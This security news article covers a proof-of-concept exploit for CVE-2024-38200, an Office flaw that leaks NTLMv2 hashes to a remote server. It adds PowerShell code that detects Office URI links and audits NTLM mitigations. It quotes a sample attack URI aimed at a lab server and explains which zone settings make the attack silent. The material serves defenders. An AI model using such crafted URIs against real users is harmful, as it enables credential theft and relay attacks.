PoC Exploit Released for Microsoft Office 0-day Flaw


Security researchers have released a proof-of-concept (PoC) exploit for the recently disclosed Microsoft Office vulnerability CVE-2024-38200, which could allow attackers to capture users’ NTLMv2 hashes.

This high-severity flaw affects multiple versions of Microsoft Office, including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise.


The vulnerability, initially reported by Jim Rush of PrivSec Consulting and Metin Yunus Kandemir of Synack’s Red Team, allows attackers to initiate an outbound NTLM connection from a victim’s system to a remote server controlled by the attacker.

When this connection occurs, the attacker's server issues an NTLM challenge and Windows answers it silently with the user's NTLMv2 response (often called the Net-NTLMv2 hash), a value computed from the user's password hash. The attacker can crack that response offline to recover the password, or relay it to another service that accepts NTLM, which is why the flaw is described as a hash leak.


The PoC exploit, published on GitHub, demonstrates how the flaw can be exploited using Office URI Schemes.

By crafting a specially formatted URI (e.g., ms-excel:ofe|u|http://192.168.1.7/leak.xlsx, where the address is the researchers' lab server), attackers instruct the Office application to open a remote file for editing, and Office fetches it without the warning a user would normally see. Because the file can be served over SMB (a UNC path) or over HTTP (WebDAV), NTLMv2 responses can be captured over either protocol.
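The URI format above, as an added example that is not from the article or the PoC repository: a PowerShell function that pulls Office URI scheme links out of a block of text (an email body, an HTML page, a proxy log line), parses the scheme, command and target, and flags links whose target is a remote host, which is the property that lets the remote server demand NTLM authentication. The scheme and command names are those documented for the Office URI scheme; the allow-listed hosts and the sample email body are constructed for the example.

```powershell
# Added example (not from the original article or the PoC repository): find
# Office URI scheme links in text and flag the ones that point at a remote host.

# Office URI scheme grammar:  <scheme>:<command>|<descriptor>|<argument>
#   schemes    ms-word, ms-excel, ms-powerpoint, ms-visio, ms-access, ms-project, ms-publisher
#   commands   ofv (open for view), ofe (open for edit), nft (new from template)
#   descriptor u (URI of the document) or s (save location, used with nft)
$OfficeUriPattern = '(?i)\b(ms-(?:word|excel|powerpoint|visio|access|project|publisher)):(ofv|ofe|nft)\|(u|s)\|([^\s"''<>]+)'

function Get-OfficeUriLink {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$Text,
        # Hosts that legitimately serve documents (your SharePoint/OneDrive/file servers);
        # the names used in the sample below are made up.
        [string[]]$AllowedHost = @()
    )
    process {
        foreach ($m in [regex]::Matches($Text, $OfficeUriPattern)) {
            $target     = $m.Groups[4].Value
            $targetHost = $null
            $transport  = 'local file'
            if ($target -match '^\\\\([^\\]+)\\') {
                # UNC path: Office opens it over SMB, and the server can send an NTLM challenge
                $targetHost = $Matches[1]; $transport = 'SMB (UNC path)'
            } elseif ($target -match '^(https?)://([^/:?#]+)') {
                # http/https: Office uses WebDAV, and the server can likewise demand NTLM
                $targetHost = $Matches[2]; $transport = "$($Matches[1].ToUpper()) (WebDAV)"
            }
            $isIp    = [bool]($targetHost -and $targetHost -match '^\d{1,3}(\.\d{1,3}){3}$')
            $allowed = [bool]($targetHost -and ($AllowedHost -contains $targetHost))
            [pscustomobject]@{
                Scheme     = $m.Groups[1].Value.ToLower()
                Command    = $m.Groups[2].Value.ToLower()
                Target     = $target
                Host       = $targetHost
                Transport  = $transport
                # Remote target that is not on the allow-list: whoever runs that
                # host gets a chance to challenge the victim for NTLM credentials.
                Suspicious = [bool]($targetHost -and -not $allowed)
                BareIp     = $isIp
                Raw        = $m.Value
            }
        }
    }
}

# Constructed sample: an HTML email body carrying four Office links.
$sample = @'
<p>Quarterly numbers: <a href="ms-excel:ofe|u|http://192.168.1.7/leak.xlsx">open</a></p>
<p>Template: <a href="ms-word:ofv|u|https://sharepoint.contoso.example/sites/fin/Q3.docx">view</a></p>
<p>Offline copy: ms-powerpoint:ofe|u|C:\Users\Public\deck.pptx</p>
<p>Share: ms-word:ofe|u|\\fileserver01\shared\notes.docx</p>
'@

$sample | Get-OfficeUriLink -AllowedHost 'sharepoint.contoso.example', 'fileserver01' |
    Format-Table Scheme, Command, Host, Transport, Suspicious, BareIp -AutoSize
```

Run against the sample, only the first link is reported as suspicious: it is an http target on a bare IP address that is not on the allow-list. The SharePoint and file-server links are remote but allow-listed, and the C: path never leaves the machine. The same function can be pointed at mail-gateway or proxy logs to hunt for the pattern after the fact.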

Researchers have noted that the vulnerability is particularly dangerous when combined with certain Group Policy Object (GPO) configurations in Internet Properties.

If specific settings are applied, such as assigning IP ranges to the Trusted Sites zone or setting the zone's User Authentication > Logon option to "Automatic logon with current user name and password", the Office application will send the NTLM response to any server in that zone without prompting, so an attacker whose server falls inside the assigned range needs no user interaction beyond the initial click.

Microsoft shipped a partial fix via Feature Flighting on July 30, 2024, and the final patch with the August 13, 2024 updates. For systems that have not yet received the update, and as defence in depth on those that have, security experts recommend several mitigations: configure the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, add sensitive accounts to the Protected Users security group, and block outbound TCP port 445 at the network edge. Note that the port 445 block only covers the SMB path; the HTTP (WebDAV) variant of the attack still requires the NTLM restriction or Protected Users membership.
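The mitigations and the risky zone configuration described above, as an added example that is not from the article: a read-only PowerShell audit that reports the state of each setting on a Windows client. It reads the registry values behind the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy and the Internet zone logon option, lists sites or IP ranges that policy has assigned to the Local Intranet or Trusted Sites zone, looks for an enabled outbound firewall block on TCP 445, and checks the current logon token for Protected Users membership. Run it in an elevated PowerShell session on a domain-joined machine; it changes nothing. The registry paths and value meanings are the documented ones; the finding labels and the Ok/Note columns are this example's own.

```powershell
# Added example, not from the original article or the PoC: a read-only audit of
# the settings behind the mitigations above and of the zone/logon policy that
# the researchers flag as making exploitation easier.

function Get-RegValue {
    # Returns $null instead of throwing when the key or value does not exist.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function New-Finding($Check, $Value, $Ok, $Note = '') {
    [pscustomobject]@{ Check = $Check; Value = $Value; Ok = $Ok; Note = $Note }
}

function Test-NtlmLeakMitigation {
    $findings = @()

    # 1. "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers"
    #    RestrictSendingNTLMTraffic: 0 = allow all, 1 = audit all, 2 = deny all
    $v = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' 'RestrictSendingNTLMTraffic'
    $label = if ($null -eq $v) { 'not set (allow)' } elseif ($v -le 2) { @('allow', 'audit', 'deny')[$v] } else { "unknown ($v)" }
    $findings += New-Finding 'Outgoing NTLM to remote servers' $label ($v -eq 2) 'Deny (2) stops the client answering a remote NTLM challenge'

    # 2. "User Authentication > Logon" (value 1A00) for Local Intranet (zone 1) and Trusted Sites (zone 2).
    #    0x00000 = automatic logon with current user name and password, 0x10000 = prompt,
    #    0x20000 = automatic logon only in Intranet zone, 0x30000 = anonymous.
    #    Policy keys override the user's own settings, so they are read first.
    $zoneRoots = @(
        'HKLM:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKCU:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
    )
    $logonNames = @{ 0 = 'automatic logon'; 0x10000 = 'prompt'; 0x20000 = 'automatic logon in intranet zone only'; 0x30000 = 'anonymous' }
    foreach ($zoneId in 1, 2) {
        $zoneName = @{ 1 = 'Local Intranet'; 2 = 'Trusted Sites' }[$zoneId]
        $logon = $null
        foreach ($root in $zoneRoots) {
            $logon = Get-RegValue "$root\$zoneId" '1A00'
            if ($null -ne $logon) { break }
        }
        if ($null -eq $logon) { $label = 'not set (zone default)'; $ok = $null }
        else {
            $label = $logonNames[[int]$logon]
            if (-not $label) { $label = '0x{0:X}' -f $logon }
            $ok = ($logon -ne 0)   # 0 = credentials sent silently to any site in the zone
        }
        $findings += New-Finding "$zoneName zone logon option" $label $ok 'Automatic logon (0) answers NTLM challenges without a prompt'
    }

    # 3. Sites or IP ranges placed in zone 1 or 2 by the "Site to Zone Assignment List" policy
    #    (value names are site patterns, data is the zone number). An IP range here means an
    #    attacker host inside that range is treated as trusted.
    foreach ($root in 'HKLM:', 'HKCU:') {
        $map = Get-ItemProperty "$root\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapKey" -ErrorAction SilentlyContinue
        if (-not $map) { continue }
        foreach ($p in ($map.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            $zone = $p.Value -as [int]
            if ($zone -in 1, 2) {
                $ipRange = [bool]($p.Name -match '^(\w+://)?\d{1,3}\.\d{1,3}\.')
                $note = if ($ipRange) { 'IP range assigned to a trusted zone' } else { 'review' }
                $findings += New-Finding "Site-to-zone: $($p.Name) -> zone $zone" 'assigned by policy' (-not $ipRange) $note
            }
        }
    }

    # 4. An enabled outbound firewall rule blocking TCP 445 (SMB) to remote hosts.
    $smbBlock = Get-NetFirewallPortFilter -Protocol TCP -ErrorAction SilentlyContinue |
        Where-Object { $_.RemotePort -contains '445' } |
        Get-NetFirewallRule |
        Where-Object { $_.Direction -eq 'Outbound' -and $_.Action -eq 'Block' -and $_.Enabled -eq 'True' }
    $ruleName = if ($smbBlock) { ($smbBlock | Select-Object -First 1).DisplayName } else { 'no rule' }
    $findings += New-Finding 'Outbound TCP 445 blocked by firewall' $ruleName ([bool]$smbBlock) 'Covers the SMB path only; HTTP/WebDAV leaks need check 1 or 5'

    # 5. Protected Users membership for the current user (domain-relative RID 525);
    #    members of that group cannot authenticate with NTLM at all.
    $groups = [System.Security.Principal.WindowsIdentity]::GetCurrent().Groups
    $inProtected = [bool]($groups | Where-Object { $_.Value -like 'S-1-5-21-*-525' })
    $findings += New-Finding 'Current user in Protected Users' $inProtected $inProtected 'Read from the logon token'

    $findings
}

Test-NtlmLeakMitigation | Format-Table Check, Value, Ok, Note -AutoSize -Wrap
```

Each row with Ok set to False is a gap relative to the article's mitigation list; an Ok of $null on the zone logon rows means the value is not explicitly configured and the zone's built-in default applies, which is worth confirming in the IE security settings UI. Remediation belongs in Group Policy rather than in a script, so the audit deliberately writes nothing.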

The release of this PoC exploit highlights the urgency for organizations to apply the August 2024 updates and implement the recommended mitigations.

It also serves as a reminder of the ongoing risks associated with NTLM authentication, which Microsoft has officially deprecated in favor of more secure alternatives like Kerberos.

As the threat landscape continues to evolve, system administrators and security professionals must stay informed about emerging vulnerabilities and take prompt action to protect their networks and users from potential attacks exploiting flaws like CVE-2024-38200.
